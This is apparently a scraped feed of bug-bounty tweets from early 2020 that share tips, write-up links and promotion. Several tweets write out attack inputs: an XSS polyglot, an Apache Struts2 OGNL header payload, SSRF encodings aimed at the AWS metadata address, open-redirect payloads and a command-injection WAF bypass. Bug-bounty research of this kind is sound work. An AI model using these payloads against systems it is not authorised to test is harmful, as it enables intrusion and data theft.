2020-03-04 03:26:45
4 Here we are again coming back with one of very essential command i.e. “Perl”. As we know Perl has its significance in the era of programming language. @rajchandel @ubuntu #cybersecurity #linux #bugbountytip #perl #pentest #ITSecurity #WednesdayMotivation https://t.co/RuJrg2IBxo
ninetynine
@ninetyn1ne_


2020-03-03 16:59:39
0 Quick tip :- Try sending POST requests with an empty body. Sometimes servers respond with an ' xyz parameter not found ' error which may contain previously unknown parameters!! Happy hunting ;) #bugbounty #bugbountytip
Abugzlife
@abugzlife1


2020-03-03 15:53:56
2 Exploiting an SSRF: Trails and Tribulation - New post about the thought process of attacking and exploiting a set of functionality. Not a novel method but the trial & error process is the highlight. https://t.co/9Ag9RTx7Jf #bugbounty #bugbountytip #infosec
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-03-03 14:08:11
1 Instagram API endpoint (with acces_token?) #Bing Is this not risk to be exposed? Follow Us 💰💰👇👇👇👇 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/UCGLM75ugP
Rajesh Ranjan
@rajesh_ranjan4


2020-03-03 12:09:35
3 Here's a write-up on how I earned my first bounty! https://t.co/XyiRexInJm Thanks to @bejuveria_ for proofreading #bugbountytip #bugbounty #infosec #bugcrowd
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-03-03 11:07:06
1 Linux Commands To Remember - #Basics Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/nhF4SN8Sd5 Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/ZaZGIx5f4S
RootRaZoR
@rootraz0r


2020-03-03 10:55:01
0 #bugbountytip #Hacking #Exploit New Exploit Shared http fuck :) https://t.co/Vg2e1PqXbc
HackDoor
@hackd00r


2020-03-03 06:14:01
0 Contact Us For Corporate Trainings on Cyber Security Follow #Hackdoor - Facebook - https://t.co/lb0uyl3k4p Instagram - https://t.co/1YqKY0ZFK1 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining https://t.co/rFluc53uvN
Your Next Bug Tip
@YourNextBugTip


2020-03-03 04:29:35
6 #bugbounty Daily 2-3 hrs Recon -> RCE & Full Internal N/w Access - Gr8 Explanation of Hacker's MINDSET🔥 - Github & Google Recon Power⚡ A very long & detailed writeup about Multiple critical #vulnerabilities by @YoKoAcc https://t.co/hJFSkHnKVX #bugbountytips #bugbountytip
Secuna
@SecunaSecurity


2020-03-03 02:11:41
0 Directory Traversal or Path Traversal is a vulnerability that could allow an attacker to access restricted and confidential files and directory. https://t.co/C90xTTxkYB #DirectoryTraversal #BugBountyTip #Cybersecurity #SecurityFirst
Bug Bounty Village
@bugbountyvillag


2020-03-02 17:45:00
5 (7/7) API Security tip by @HivarekarPranav For any json/xml API endpoint, try to change extension to jsonp which may give you data in jsonp format. It can be easily stolen cross site. #bugbounty #bugbountytips #bugbountytip
Micah Smith
@MSDgtl


2020-03-02 17:00:07
0 US jails #Chinese Scientists. Zero-day Exploits in #WordPress Plug-ins. US Railroad Contractor #DataBreach **** #CyberSecurity #infosec #InformationSecurity #bugbountytip #technology https://t.co/zqQhT3ZCCC
INTIGRITI
@intigriti


2020-03-02 14:36:35
12 Finding internal domains was never so easy thanks to https://t.co/VS3AwIHKAC! Thanks for sharing this amazing tool with us, @ehsahil! #BugBountyTip #HackWithIntigriti https://t.co/VGKwdyY3GH
Bug Bounty Village
@bugbountyvillag


2020-03-02 13:30:00
6 Tip by @thedawgyg When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 #bugbountytip #bugbounty #bugbountytips
Your Next Bug Tip
@YourNextBugTip


2020-03-02 11:02:06
1 I think you people can collab with him and create awesome #bugbountyTOOLS together. #TogetherWeHitHarder #bugbounty #bugbountytip #bugboutnytips https://t.co/qMrRjBVL0m
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-03-02 05:16:40
3 Corporate Training on #SIEM ! 🥇🏆 #HappyClients Helping Setup SOC Team for our Client 👇👇 🔥 Join Us 🔥 #Hackdoor #Swag #corporatetraining #cybersecurity #CyberSecurityTraining #hackers #infosec #bugbounty #bugbountytip https://t.co/Bc7TIPZuOh
Ammar Amer🇸🇾
@cry__pto


2020-03-01 23:25:00
1 i gonna create videos about hacking contain POC for vulnerable websites,is it OK to share this on twitter for educational purpose ONLY. #bugbountytip #hacking #Pentesting #BugBounty #redteam #infoec #CyberSecurity
bugbountytip
@a_l_e_r_t_1_


2020-03-01 18:03:56
3 Happy hacking guys :) #bugbountytips #bugbountytip #infosec #sharingisgood https://t.co/u9IzXWE6N0
ZishanAdThandar
@ZishanAdThandar


2020-03-01 17:15:44
0 temporary post.. trying xss on https://t.co/hkWbxZVTk1 ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com'><svg onload=alert``><?script>alert(`1`)> #bugbounty #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-03-01 16:47:22
6 Finding Hidden IDORS #bugbountytips - Attention to details - Decompile Apps(Android/iOS) - RTF[JS] Bugs are simple, persistence is the key. [email protected] MUST READ https://t.co/Xk8OvJilwJ #bugbountytip #bugbounty
Bug Bounty Village
@bugbountyvillag


2020-03-01 15:30:00
3 (6/7) API Security tip by @HivarekarPranav Found an API endpoint used for uploading, change the upload file param to URL and test for SSRF. Many times it can lead you to full blown SSRF. #bugbounty #bugbountytips #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-03-01 13:30:00
5 Tip by @Paresh_parmar1 purchase paid version of product, list out all the endpoints which is only available for paid user. n try to play those endpoints in free version of product. see if u can use paid version's features in free version. #bugbounty #bugbountytips #bugbountytip
Yash sariya jain
@stylish_hacker_


2020-03-01 11:48:27
0 https://t.co/3wLsQ4s9Vh *root-me CTF Solution For bughunter* #bugbountytip #bugbountytips #hackers #rootme #owasp #lab #ctf
Yash sariya jain
@stylish_hacker_


2020-03-01 11:44:47
1 https://t.co/dyIUqiifZ9 Owaspp Bwapp Lab solution For Bug Hunter #bugbountytips #bugbountytip #bugbounty #hacker #owasp #bwapp
Yash sariya jain
@stylish_hacker_


2020-03-01 09:04:39
0 PortSwigger Websecurity Lab Solution Video Playlist https://t.co/4ijOOALdpH #portswigger #burpsuite #hacker #bugbountytips #BugBounty #bugbountytip #infosec #Hacking #bugbountyprotip
Your Next Bug Tip
@YourNextBugTip


2020-03-01 03:24:34
4 All CSRF Bypasses from all over the net. Last one is the most interested one (bypass XHTTPRequest check using flash), but not exploitable in 2020, It will teach you how to create you own way. Did I miss anything? #bugbountytips #bugbountytip #bugbounty https://t.co/f6VrZlivFz
Bug Bounty Village
@bugbountyvillag


2020-02-29 17:30:00
5 (5/7) How to test for XXE in the API? by @HivarekarPranav Change content-type in the request to `application/xml` and verify if the application is processing it. If it is processed then you can go on and test for XXE. #bugbounty #bugbountytips #bugbountytip
Anshuman Pattnaik
@anspattnaik


2020-02-29 16:25:38
1 #bugbountytip Is all ASN no are within the scope, if the program didn't mentioned in their policy? I mean will it be valid for submission or it will marked as N/A.
Ammar Amer🇸🇾
@cry__pto


2020-02-29 12:20:23
8 Pentest Tips and Tricks #1.pdf https://t.co/tviY9RRWBa Pentest Tips and Tricks #2.pdf https://t.co/3rstUe0yxB Bug-Bounty-Bookmarks.pdf https://t.co/Lgt3HtorQl android pentesting sheet .pdf: https://t.co/o7k0LLiuAn #bugbountytips #hacking #OSINT #pentest #bugbountytip #redteam
rinaki
@rinakikun


2020-02-29 10:08:15
0 So much truth in this one tweet. #BugBountyTip https://t.co/o7X7kXD94K
Bug Bounty Village
@bugbountyvillag


2020-02-29 06:26:00
6 Tip by @armaancrockroax inject bxss payloads in appstore/play store’s app reviews. Many times companies use third party app review analysis apps. Payload can get triggered on the third party app which can give you access to some sensitive information. #bugbounty #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-28 15:23:00
5 (4/7) API Security tip by @HivarekarPranav JSON API endpoints are vulnerable to CSRF, just set content-type to `text/plain` and see if it works. #bugbounty #bugbountytips #bugbountytip
Exploiting all - Hack to Learn
@osvaldo_hp


2020-02-28 15:10:08
5 tip to help you at pentest @YourNextBugTip #bugbountytip #BugBountyTips #BugBounty https://t.co/a29eVLxxtj
Nick || hunt4p1zza
@ngkogkos


2020-02-28 15:06:35
1 Always take PoC (screenshots, images) when performing attacks that may trigger later (BXSS, template injections). Example: you receive a promotional email months later that uses a vulnerable template. This will save time from trying to reproduce the issue.#bugbounty #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-28 13:30:00
0 #bugbountytip by @prateek_0490 Got an SSRF? But app prevents trying to connect to localhost https://t.co/SBD0GwZWc0? DNS Pinning for the win, create, set subdomain, point it to 127.0.0.1>use remote red> <?php header("Location: https://t.co/mjBUtPZ6JL"); die(); ?> #BugBounty
Your Next Bug Tip
@YourNextBugTip


2020-02-28 09:02:47
2 Apache Struct2 RCE [2020] Payload: Content-Type: .multipart/form-data~%{#context[“com.opensymphony.xwork2.dispatcher.HttpServletResponse”].addHeader(“Namehere”,4*4)} Hacked by @abhishake100 https://t.co/CnC05oreB1 #bugbountytips #bugbountytip #bugbounty
'--+-
@mohsink83789226


2020-02-28 06:22:34
0 When I use ' with cookie - response hidden. And when I use ' 'a , response showing..... I try ' sleep(10) 'a not working :( ' order by also now working. But when I use sqlmap, sqlmap response => target URL appears to have 17 column's in query?? Help🙂 #BugBounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-28 00:51:09
1 Never Ask A #hacker to #hack FB and Insta Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/xeCP5xnmLr
TheEthicalKid
@kid_ethical


2020-02-28 00:08:49
3 @Bugcrowd New Dark Mode Looks great! #bugcrowd #bugbounty #hackerone #hack #xss #bugbountytip #bughunters #developers #xxe #ssrf #sqlinjection #programmers #python #ruby #hacks #hackers #ethicalhacking #mrrobot #whitehat #injections #security #vulnerability #exploitation https://t.co/PpRPbGkx3N
Steve Mcilwain
@steve_mcilwain


2020-02-27 22:17:17
0 Trim n characters from the end of a string: alias trim1="sed 's/.$//'" alias trim2="sed 's/..$//'" alias trim3="sed 's/...$//'" alias trim4="sed 's/....$//'" Use like: cat sub-domains.txt | httprobe -s -p https:443 | trim4 #bugbountytip #bugbountytips
Steve Mcilwain
@steve_mcilwain


2020-02-27 21:42:34
0 Not great for OPSEC, but sometimes I do this when running a lot of scans or a script on Kali (not as root) to skip some sudo's: echo "$USER ALL=(ALL:ALL) NOPASSWD: /usr/bin/nmap, /usr/bin/masscan" | sudo tee /etc/sudoers.d/$USER #BugBountyTips #bugbountytip #PenTest
Naategh
@Naategh_


2020-02-27 19:34:28
0 OMG! Why had I not seen this note-taking app before? -_- Use it to take notes while hunting, It supports markdown. https://t.co/KEz7x9LJt1 #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-27 15:45:00
4 (3/7) API Security tip by @HivarekarPranav Testing third party APIs, focus on studying and testing scope permissions instead of performing traditional privilege escalation testing. #bugbounty #bugbountytips #bugbountytip
Nguyen The Duc
@ducnt_


2020-02-27 15:07:41
0 Filed a duplicate with gr8 bug was found by @SecurityMB but can reopen it with a triaged issue. Really a excited moment. #bugbountytip https://t.co/iI1mSCfNLC
Bug Bounty Village
@bugbountyvillag


2020-02-27 13:30:00
5 Tip by @stokfredrik Got a big scope? Take screenshots with EyeWitness and sort them by file size to get the juicy stuff! #bugbounty #bugbountytips #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-02-27 12:30:42
0 Open Redirect @Hacker0x01's Markdown Payload: [Go to https://t.co/8b66WBIgJW](https://t.co/gIHwGWmWq3%https://t.co/s71RUjUop3%[email protected]) $$500$$ Hacked By @shailesh4594 Read Here https://t.co/fuqPTOJYZ4 #bugbountytips #bugbountytip #bugbounty
Your Next Bug Tip
@YourNextBugTip


2020-02-27 12:19:57
4 Open redirect Payload: /login?next=Http:3627732462 3627732462 is decimal form of IP address of google.cox Hacked by @shailesh4594 $$200$$ https://t.co/X2JTcq0CgC #bugbountytips #bugbountytip #bugbounty
Abhishek 🕵️
@abhishake100


2020-02-27 05:46:16
0 I just published RCE via Apache Struts2 - Still out there. #bugbounty #bug #bounty #bugbountytip https://t.co/y4tfDTZiRZ
Your Next Bug Tip
@YourNextBugTip


2020-02-27 04:57:25
0 Finally a perfect Write Up for #bugbountyBEGINEERS This is how @harrmahar Found his first P1, He shared a detailed write up. #bugbountyTip Sharp Your Axe Before Hitting the Tree Well done @harrmahar https://t.co/XoHfy4azMN #bugbountytips #bugbounty
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-27 02:18:45
3 Never Ask A #hacker to #hack FB and Insta Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ObUCVhHOed
Noble Six
@NobleSiXSS


2020-02-26 22:30:00
1 Just released my first tool! It's a status code checker built in Golang that supports concurrency Check it out here https://t.co/jzT3rMxj40 #bugbountytip #bugbountytips #infosec #bugbounty
Nouroz Gaming
@NourozGaming


2020-02-26 19:22:29
0 When testing for SSRF using a black list, take internal IP addresses and when encoding them, don't encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018) #bugbountytip #bugbounty
Bug Bounty Village
@bugbountyvillag


2020-02-26 16:30:00
3 (2/7) API Security tip by @HivarekarPranav API endpoints are mostly not secure against cross site stealing bugs which includes CSRF and CORS. So, test it when you start. #bugbounty #bugbountytips #bugbountytip
Samet SAHIN
@sametsahinnet


2020-02-26 15:20:19
1 #bugbountytip #bugbountytips Send empty values for each required parameters. Maybe they are not required, right? @ozgur_bbh https://t.co/XWRs90zYNJ
baluz🔥
@oyenom


2020-02-26 15:08:17
2 Some new blogs published #bugbountytip #bugbounty https://t.co/NWBDWv4xTI https://t.co/ul2npeoVHP
x1m
@x1m_martijn


2020-02-26 14:52:32
0 Golden techniques to bypass host validations in Android apps https://t.co/8LQRI7V8tJ by @_bagipro #AndroidHackingMonth #bugbountytip
Bug Bounty Village
@bugbountyvillag


2020-02-26 13:45:00
5 Tip by @RahulKankrale Scheme verification bypass using Line Feed & Parameter pollution if only https/http schemes allowed then using %0A & parameter pollution it is possible to bypass this restriction. scheme://route?uri=http%0A&uri=protected_scheme://auth #bugbountytip
Bug Spotter 🔍
@BugSpotter


2020-02-26 13:26:49
0 " What is the best tool for hacking? " They ask. ' Mind ' - I reply #infosec #bugbountytips #CyberSecurity #bugbountytip
Dujunayan
@dujunayan


2020-02-26 12:40:09
0 #bugbountytip Share your knowledge before you die, #corona’s coming.
bugbountytip
@a_l_e_r_t_1_


2020-02-26 08:37:16
0 Anyone have incapsula waf bypass payload for xss or lfi? #bugbountytips #bugbountytip #infosec
Ammar Amer🇸🇾
@cry__pto


2020-02-26 07:24:27
1 Should I create videos about hacking? #Hacking #bugbountytip #Pentesting #redteam
darkmage
@therealdarkmage


2020-02-26 07:18:38
3 I successfully got something accepted to a program but it was sadly a non-paying vulnerability :( I felt like it should be worth more than points but hopefully next one will be much bigger! #bugbounty #hacking #bugbountytip #bugbountytips https://t.co/NyV33M1yLx
AkaaZaan
@AkaaZaan


2020-02-26 05:56:44
0 Yesterday, there was a .jsp extension related #bugbountytip by someone. Can someone tag me in that, I cannot find it.
Abhijeet Jain
@seecure963


2020-02-25 17:41:00
3 Best way to find external bug bounty programs is to use this google dork "intext: we take security seriously reward" #bugbountytip #bugbounty
Bug Bounty Village
@bugbountyvillag


2020-02-25 16:30:00
2 (1/7) How to find high impact vulnerabilities in the API? by @HivarekarPranav Search for hidden endpoints which are implemented on the API but are not used anywhere. Such endpoints can be found in JS files, reversing mobile apps, etc. #bugbounty #bugbountytips #bugbountytip
Sofiane Hamlaoui
@S0fianeHamlaoui


2020-02-25 14:41:04
5 Lockdoor Framework : A Penetration Testing Framework, has now 356 ⭐️ and 102 Fork on github. Big thanks to everyone for the support and the share 🙏🏻 #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking https://t.co/uSVX7JcTEl
fuzzsqlbOf
@fuzzsqlbof


2020-02-25 10:55:11
0 SQL Injection Writeup https://t.co/6yqfR40Lct #bugbountytips #togetherwehitharder #bugbountytip #CyberSecurity #hackerone
Bug Bounty Village
@bugbountyvillag


2020-02-25 10:48:13
6 #bugbountytip Command Injection WAF bypass trick:- Using empty shell variables, like ${something} and ${doesn'texist}. Thanks to @Voulnet #bugbounties #infosec #security #bounty #hacking https://t.co/jMt6j4fV0P
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-25 09:14:33
0 Tuesdays Be Like - Hall Of Fame from ISSUU - Reported Leaking API Credentials - Fixed ! 👇👇👇 Follow #Hackdoor - Facebook - https://t.co/iNczOcXY13 LinkedIn - https://t.co/nhF4SNqtBF Instagram - https://t.co/Q0OxMhsE7n Youtube - https://t.co/42lWP1m84s #BugBounty #BugBountyTip https://t.co/SJgsrNCjpi
Ajay Gautam
@evilboyajay


2020-02-25 03:33:08
2 If you find html injection then add clickjacking script as payload for the same site you are testing. If they have prevented clickjacking but the x-frame-header is same-origin then you can successfully get clickjacking vulnerability. #bugbountytip
BUGemot
@bugemot


2020-02-24 22:11:44
0 Multiple Critical Vulnerabilities discovered in Open-Xchange https://t.co/uP4ZhTv6Ta CVE-2019-18846/CVE-2019-9853 - https://t.co/gAO6zM7D7O #bugbountytip #BugBounty #CVE #CyberSecurity
Ammar Amer🇸🇾
@cry__pto


2020-02-24 20:46:10
2 Information Gathering with Google.pdf https://t.co/mOzevBFm30 DNS Enumeration.pdf https://t.co/1BAccMMXRS Vulnerability Research Engineering Bookmarks Collection.txt https://t.co/aRQcnazzlG Escalating SSRF to RCE.pdf https://t.co/yUqgQNel5N #bugbountytip #hacking #pentest #OSINT
Steve Mcilwain
@steve_mcilwain


2020-02-24 18:03:46
3 Tired of manually tuning scope in Burp Suite? I just tried rescope by @root4loot. It let's you point to the URL of a bug bounty program and generate scope for Burp or Zap. https://t.co/9SdUJLbqEE #BugBounty #bugbountytips #bugbountytip
Noman | نعمان | नोमान
@nomanAli181


2020-02-24 17:24:32
0 Few months back this portal first came on a diff subdomain, But I was done for the day and bookmarked it to analyze it next day but that host went down. Last week it came back on a new host and this time I was ready :) #bugbountytip monitor the targets you know/love #bugbounty https://t.co/7IIC0EXlIt
Pranav Hivarekar
@HivarekarPranav


2020-02-24 16:30:00
11 GraphQL Security Testing: Resources to learn- - https://t.co/tMqWzRtxLE - https://t.co/yvqDh89goj Research- https://t.co/1LSUUDHEnh Examples of bugs: - https://t.co/0yOBmHudTt - https://t.co/Ts6hgFJlxr - https://t.co/vNaECJNxa3 #bugbountytip
Your Next Bug Tip
@YourNextBugTip


2020-02-24 15:49:27
2 SIM Api key leak found by @KHIZER_JAVED47 Tip: While do recon, always extract mobile App and read the files, some devs forgot API KEY, PASSWORD and other juicy stuff in it. (3 min read) https://t.co/ijrYjZOKT2 #bugbountytips #bugbountytip #bugbounty
baluz🔥
@oyenom


2020-02-24 15:20:51
3 Bypass android ssl pinning apk No frida needed...... #bugbountytip #bugbounty https://t.co/FBgYMcjRws
baluz🔥
@oyenom


2020-02-24 15:17:14
0 My blog no 3 bypassing ssl pinning of android apk #bugbounty #bugbountytip https://t.co/XYeM6zw6pN
baluz🔥
@oyenom


2020-02-24 12:26:35
0 Accessing your phone through ssh https://t.co/a79A90Iz1D #bugbountytip #bugbounty
Shubham Arya
@iam_shubhamarya


2020-02-23 18:52:08
1 My first blog :) “Hack The Box Methodology” by Shubham Arya https://t.co/zmS4pzH0rv . . . . #Hacking #bugbountytip #bugbountytips #Hackers #Hackthebox #CyberSecurity #Python #programming #code
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-23 18:09:20
4 SQLi Without Quotes (MariaDB) https://t.co/W7bdONVllL Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devsecops #cybersecurity
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-23 17:26:54
1 Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ICR7fEC3i8
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-23 14:05:03
1 🤣Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/tNflpuxYZq
Your Next Bug Tip
@YourNextBugTip


2020-02-23 12:07:35
5 Badoo Acc Takeover - Create 2 Accs & link 2 diff fb acc in each of them - As attacker import pics via fb & copy the link - Send the link to victim - Login via attacker's fb in victim's acc Hacked by @rootxharsh https://t.co/08VkMXaDbS #bugbountytips #bugbountytip #bugbounty
siLLyDaDDy
@sillydadddy


2020-02-23 11:13:57
0 #bugbountytip I am very very new to bug bounty . But my experience in other fields have taught me "how to learn " I see , my brothers/friends just taking a course and trying hard , really hard on bug bounties If your axe is blunt no matter how hard u hit u cannot cut a tree
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-23 07:04:52
0 #Swag For Hackers and Bug Hunters Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8tJRnZ8O2U
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-23 04:53:59
1 #SpiderMan vs #HackerMan Follow Us for Bug Bounty Tips #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8MHcRUYdOH
Your Next Bug Tip
@YourNextBugTip


2020-02-23 03:40:15
5 Click Reset Pwd N times U will get N links If first link still works Then issue as much as links possible Bruteforcing Token will be easy If there is no rate limit then B000M Write Up by @LnaziJubaerSec https://t.co/VcExv4xer1 #bugbountytips #bugbountytip #bugbounty
Security Executions Code
@pwn0sec


2020-02-23 00:38:44
1 Googleapis /auth/admin/* #bugbountytip #bugbountytips #google https://t.co/VdADtMDFwN
Steve Mcilwain
@steve_mcilwain


2020-02-22 17:11:42
0 I store recon data on my VPS, then sync it to my laptop with sshfs and rsync (in WSL) sshfs <user>@<rhost>:~/data /mnt/data rsync -avu /mnt/data /mnt/d/recon/data fusermount -u /mnt/data #PenTest #BugBounty #bugbountytip #bugbountytips #OSINT
ghostlulz
@ghostlulz1337


2020-02-22 16:37:00
5 CSV Injection: https://t.co/loAf6mRXft ClickJacking: https://t.co/kcOYSJcbUG Exposed Firebase DB: https://t.co/WGzatNLO3C Config Files: https://t.co/Kft6p37wJM Kubernetes API : https://t.co/IZyHZ1gUJt #bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss https://t.co/73dOl6kmfM
Ammar Amer🇸🇾
@cry__pto


2020-02-22 15:22:21
9 100 ways to discover (part 1).pdf https://t.co/kCMiq7Zo1o Pentesting.pdf https://t.co/gqpXSJ29D7 Building a Malware Analysis Lab:Become a Malware Analysis Hunter in 2019.pdf https://t.co/pOvtev7KqN #bugbountytips #hacking #OSINT #pentest #redteam #Malware #bugbountytip #infosec
siLLyDaDDy
@sillydadddy


2020-02-22 13:00:12
2 #bugbounty #bugbountytip All the bug bounty write ups from @PentesterLand in an excel format . https://t.co/9xNrXKNzaP I just wanted to keep track of the https://t.co/2BlY5zTycw i pulled out the data .Hope @PentesterLand wont mind !!
Vijaysimha Reddy Bathini
@fatratfatrat


2020-02-22 11:34:58
5 My new writeup on account takeover vulnerabilities. Thanks to @Bugcrowd . https://t.co/GeLF2Xatoh #BugBounty #infosec #bugbountytip #bugbountytips #bugcrowd #CyberSecurity
Your Next Bug Tip
@YourNextBugTip


2020-02-22 08:38:15
5 Open Redirect to Account Takeover when token didn't leak Takeover is only possible when token leak with get request. But he manage to takeover without it. Profile https://t.co/VyQuQ70sqf https://t.co/Oy52jljsrG #bugbountytip #bugbounty #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-22 08:32:59
0 Useful Link to Learn Pentesting and Bug Bounty : If you want to learn Cyber Security and Ethical Hacking from professionals - Reach out to us ! https://t.co/iNczOcXY13 https://t.co/E2teD1IjCh #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-22 08:30:20
0 OWASP Vulnerabilities https://t.co/rYwbpkyizq Follow #Hackdoor - Facebook - https://t.co/iNczOcXY13 #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-02-22 08:26:57
1 Vulnerability Rating Taxonomy - VRT Follow #Hackdoor - Facebook - https://t.co/iNczOcXY13 https://t.co/Td94mIsExN #BugBounty #BugBountyTip #pentesting #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
ghostlulz
@ghostlulz1337


2020-02-21 23:55:01
1 Client Side Template Injection is the modern day XSS. People think frameworks like Angular are immune to XSS but it isn't. Its just a little bit different to execute.More info on my blog https://t.co/JnSGKDmvLm #BugBounty #bugbountytips #infosec #bugbountytip #redteam #Angular https://t.co/q2VZmkMsIs
Tomi Koski 💾💀
@tomikoski


2020-02-21 18:51:33
0 Ahoy all #BugBounty hunters, support marvelous work from creator of #ffuf and sponsor this dude @joohoi at #github You can do it🤘#bugbountytip
Shifa
@shifa_skh


2020-02-21 16:08:14
2 Always convert parameter to array you will get unexpected result, sometimes xss bypass Like, path=/abc to path["]=/abc #bugbountytip
Israel Thomas
@IsraelThomas_7


2020-02-21 14:28:23
0 John Doe: Read the damn documentation before you start hunting on my program. Me: Yeah sure, I'm still checking for the hidden document endpoint. #bugbountytip #infosec
Mayur Parmar
@th3cyb3rc0p


2020-02-21 13:26:48
0 Pro tip for bug hunting while making report dont forget to add fix of that vuln. It will increase to get bonus points/bounty. #th3cyb3rc0p #bugbountytip #bugbounty @intigriti @Bugcrowd @Hacker0x01 @openbugbounty @synack
apuhc
@apuhccc


2020-02-20 20:38:24
0 #ProTip #burpsuite #bugbountytip by @Agarri_FR (thank you master ) https://t.co/uuptoV0KtV
Sofiane Hamlaoui
@S0fianeHamlaoui


2020-02-20 15:21:50
4 @CyberSecCare CyberSecCare : A python Twitter that retweets all Security-Related tweets. Video on Youtube : https://t.co/lHmtfXOy1e #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking https://t.co/Qv7NuXk5A4
Security Executions Code
@pwn0sec


2020-02-20 15:06:11
2 Reflected (XSS) Vulnerability - on https://t.co/d5oILl2Zpw (Sandbox Domain) https://t.co/JeyZTE46cc #bugbountytip #bugbountytips #googlexss #xss https://t.co/9jesYX7z3S
Security Executions Code
@pwn0sec


2020-02-20 14:10:48
1 Broken Authentication and session management (OWASP A2) https://t.co/iFznOWZvfv #bugbountytip #bugbountytips #owasp https://t.co/0yZGL5z3al
Mohit Sharma
@ms1241721


2020-02-20 12:45:09
0 #Bugbountytip Founded no rate limit on login page : Reported but got Duplicate Tried again on another critical endpoint : Triaged Lesson learnt - If one endpoint is vulnerable , check all other, chances are they will also be vulnerable
Bug Spotter 🔍
@BugSpotter


2020-02-20 03:58:36
0 "Good bugs do not require great skills! They require sharp eyes" -Anees Khan #infosec #BugBounty #Bugbountytip
Mourad
@SecuAudit


2020-02-19 20:10:32
2 Everything is marked as "Low severity" and There is nothing you can do except leaving this program. #BugBounty #Bugbountytip @Hacker0x01 https://t.co/V9zRDo9Vxb
GokhanGK
@gkhck_


2020-02-19 19:40:43
1 New write-up 🥳🥳🥳 #hackwithcommunity #bugbountytips #bugbountytip #infosec https://t.co/E4UnlvFHWi
Leonishan
@leonishan_


2020-02-19 19:00:31
3 WAF Bypassing with Unicode Compatibility https://t.co/jSccqnlGQC #BugBounty #Bugbountytip #WAF #wafbypass #XSS
theCBTL_Edge
@theCBTL_Edge


